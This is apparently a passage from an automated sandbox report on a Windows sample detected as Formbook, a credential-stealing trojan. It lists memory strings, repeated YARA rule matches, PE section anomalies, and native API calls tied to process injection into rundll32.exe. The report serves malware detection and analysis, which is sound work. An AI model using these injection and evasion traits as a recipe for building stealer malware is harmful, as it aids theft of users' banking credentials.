          Source: 457b22da_by_Libranalysis.exe, 00000000.00000002.237432147.00000000027E3000.00000004.00000001.sdmpString found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css
          Source: rundll32.exe, 00000009.00000002.486836362.0000000004FD2000.00000004.00000001.sdmpString found in binary or memory: https://vm.tiktok.com/ZMJE3suep/a8si?NZb=jdN
          Source: 457b22da_by_Libranalysis.exe, 00000000.00000002.237290926.0000000002791000.00000004.00000001.sdmpString found in binary or memory: https://www.paypal.com/cgi-bin/webscr?cmd=_s-xclick&hosted_button_id=CJU3DBQXBUQPC
          Source: 457b22da_by_Libranalysis.exe, 00000000.00000002.237290926.0000000002791000.00000004.00000001.sdmpString found in binary or memory: https://www.paypal.com/cgi-bin/webscr?cmd=_s-xclick&hosted_button_id=CJU3DBQXBUQPC5http://servermana
          Source: 457b22da_by_Libranalysis.exe, 00000000.00000002.236001012.00000000009E8000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000009.00000002.481738454.00000000011E0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.478757286.00000000008F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.276852950.0000000001400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.238968916.00000000037E7000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.480717659.0000000000D10000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.276548151.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.276831846.00000000013D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 4.2.457b22da_by_Libranalysis.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.457b22da_by_Libranalysis.exe.400000.0.raw.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000009.00000002.481738454.00000000011E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.481738454.00000000011E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.478757286.00000000008F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.478757286.00000000008F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.276852950.0000000001400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.276852950.0000000001400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.238968916.00000000037E7000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.238968916.00000000037E7000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.480717659.0000000000D10000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.480717659.0000000000D10000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.276548151.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.276548151.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.276831846.00000000013D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.276831846.00000000013D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.2.457b22da_by_Libranalysis.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.457b22da_by_Libranalysis.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.2.457b22da_by_Libranalysis.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.457b22da_by_Libranalysis.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          PE file contains section with special charsShow sources
          Source: 457b22da_by_Libranalysis.exeStatic PE information: section name: U#j;F_`
          PE file has nameless sectionsShow sources
          Source: 457b22da_by_Libranalysis.exeStatic PE information: section name:
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_004181C0 NtCreateFile,
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_00418270 NtReadFile,
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_004182F0 NtClose,
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_004183A0 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_0041826A NtReadFile,
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_0041839A NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_019599A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_019595D0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_01959910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_01959540 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_019598F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_01959840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_01959860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_01959780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_019597A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_01959FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_01959710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_019596E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_01959A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_01959A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_01959A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_01959660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_019599D0 NtCreateProcessEx,
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_019595F0 NtQueryInformationFile,
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_0195AD30 NtSetContextThread,
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_01959520 NtWaitForSingleObject,
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_01959950 NtQueueApcThread,
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_01959560 NtWriteFile,
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_019598A0 NtWriteVirtualMemory,
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_01959820 NtEnumerateKey,
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_0195B040 NtSuspendThread,
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_0195A3B0 NtGetContextThread,
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_0195A710 NtOpenProcessToken,
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_01959B00 NtSetValueKey,
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_01959730 NtQueryVirtualMemory,
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_01959770 NtSetInformationFile,
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_0195A770 NtOpenThread,
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_01959760 NtOpenProcess,
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_01959A80 NtOpenDirectoryObject,
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_019596D0 NtCreateKey,
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_01959610 NtEnumerateValueKey,
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_01959A10 NtQuerySection,
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_01959650 NtQueryValueKey,
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_01959670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04989840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04989860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_049899A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_049895D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04989910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04989540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_049896D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_049896E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04989650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04989A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04989660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04989780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04989FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04989710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_049898A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_049898F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04989820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0498B040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_049899D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_049895F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0498AD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04989520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04989950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04989560 NtWriteFile,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04989A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04989610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04989A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04989A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04989A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04989670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0498A3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_049897A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0498A710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04989B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04989730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04989770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0498A770 NtOpenThread,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04989760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_009081C0 NtCreateFile,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_009082F0 NtClose,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00908270 NtReadFile,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_009083A0 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0090826A NtReadFile,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0090839A NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 0_2_00C92CC9
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 0_2_00C904E1
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 0_2_00C91881
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 0_2_00C92450
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 0_2_00C96C79
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 0_2_00C94590
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 0_2_00C9B1A8
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 0_2_00C936B0
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 0_2_00C944A0
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 0_2_00C94466
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 0_2_00C95411
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 0_2_00C95420
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 0_2_00C96820
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 0_2_00C96830
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 0_2_00C9A1B0
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 0_2_00C976DA
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 0_2_00C96A99
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 0_2_00C96AA8
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 0_2_00C96600
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 0_2_00C96610
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 0_2_00C95210
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 0_2_00C95F91
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 0_2_00C95FA0
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 0_2_00C923B4
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 0_2_04BF1FD0
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 0_2_04BF56C8
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 0_2_04BF80D0
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 0_2_04BF1FC2
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 0_2_053EAB38
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 0_2_053E35F0
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 0_2_053E003F
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 0_2_053E0006
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 0_2_053E8870
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 0_2_053E0040
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 0_2_053E84C8
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 0_2_053E3F37
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 0_2_053E3F32
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 0_2_053E5F10
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 0_2_053E5F68
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 0_2_053E3F40
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 0_2_053E2F90
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 0_2_053E2FF0
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 0_2_053E2FEF
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 0_2_053E43E8
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 0_2_053E43E7
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 0_2_053E43D7
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 0_2_053E526F
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 0_2_053E5280
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_00401030
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_0041C273
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_0041BAA2
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_00408C5B
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_00408C60
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_0041BC22
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_0041CC24
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_0041B4A6
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_0041BD4F
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_0041C501
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_00402D87
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_00402D90
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_0041BDBD
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_0041BF3C
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_0041C7A5
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_00402FB0
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_01942581
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_0192D5E0
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_0191F900
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_01910D20
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_01934120
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_019E1D55
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_0192B090
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_019420A0
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_0192841F
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_019D1002
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_0194EBB0
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_01936E30
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0495B090
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04A120A8
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_049720A0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0495841F
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04A01002
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04972581
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0495D5E0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0494F900
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04A12D07
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04940D20
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04964120
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04A11D55
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04A122AE
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04A12EF7
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04966E30
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0497EBB0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04A11FF1
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04A12B28
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0090B4A6
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0090CC24
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_008F8C5B
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_008F8C60
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_008F2D87
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_008F2D90
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0090C7A5
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_008F2FB0
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: String function: 0191B150 appears 32 times
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 0494B150 appears 35 times
          Source: 457b22da_by_Libranalysis.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: 457b22da_by_Libranalysis.exeBinary or memory string: OriginalFilename vs 457b22da_by_Libranalysis.exe
          Source: 457b22da_by_Libranalysis.exe, 00000000.00000002.237290926.0000000002791000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameSimpleUI.dll( vs 457b22da_by_Libranalysis.exe
          Source: 457b22da_by_Libranalysis.exe, 00000000.00000002.238739853.0000000002CA0000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameDynamicPartitionEnumeratorForIndexRangeAbstract.exeF vs 457b22da_by_Libranalysis.exe
          Source: 457b22da_by_Libranalysis.exe, 00000000.00000002.238739853.0000000002CA0000.00000004.00000001.sdmpBinary or memory string: l,\\StringFileInfo\\000004B0\\OriginalFilename vs 457b22da_by_Libranalysis.exe
          Source: 457b22da_by_Libranalysis.exe, 00000000.00000002.238968916.00000000037E7000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameDSASignature.dll@ vs 457b22da_by_Libranalysis.exe
          Source: 457b22da_by_Libranalysis.exe, 00000000.00000002.236001012.00000000009E8000.00000004.00000020.sdmpBinary or memory string: OriginalFilenameclr.dllT vs 457b22da_by_Libranalysis.exe
          Source: 457b22da_by_Libranalysis.exe, 00000004.00000002.277387221.0000000001B9F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs 457b22da_by_Libranalysis.exe
          Source: 457b22da_by_Libranalysis.exe, 00000004.00000000.234003452.0000000000E58000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameDynamicPartitionEnumeratorForIndexRangeAbstract.exeF vs 457b22da_by_Libranalysis.exe
          Source: 457b22da_by_Libranalysis.exeBinary or memory string: OriginalFilenameDynamicPartitionEnumeratorForIndexRangeAbstract.exeF vs 457b22da_by_Libranalysis.exe
          Source: 457b22da_by_Libranalysis.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 00000009.00000002.481738454.00000000011E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.481738454.00000000011E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.478757286.00000000008F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.478757286.00000000008F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.276852950.0000000001400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.276852950.0000000001400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.238968916.00000000037E7000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.238968916.00000000037E7000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
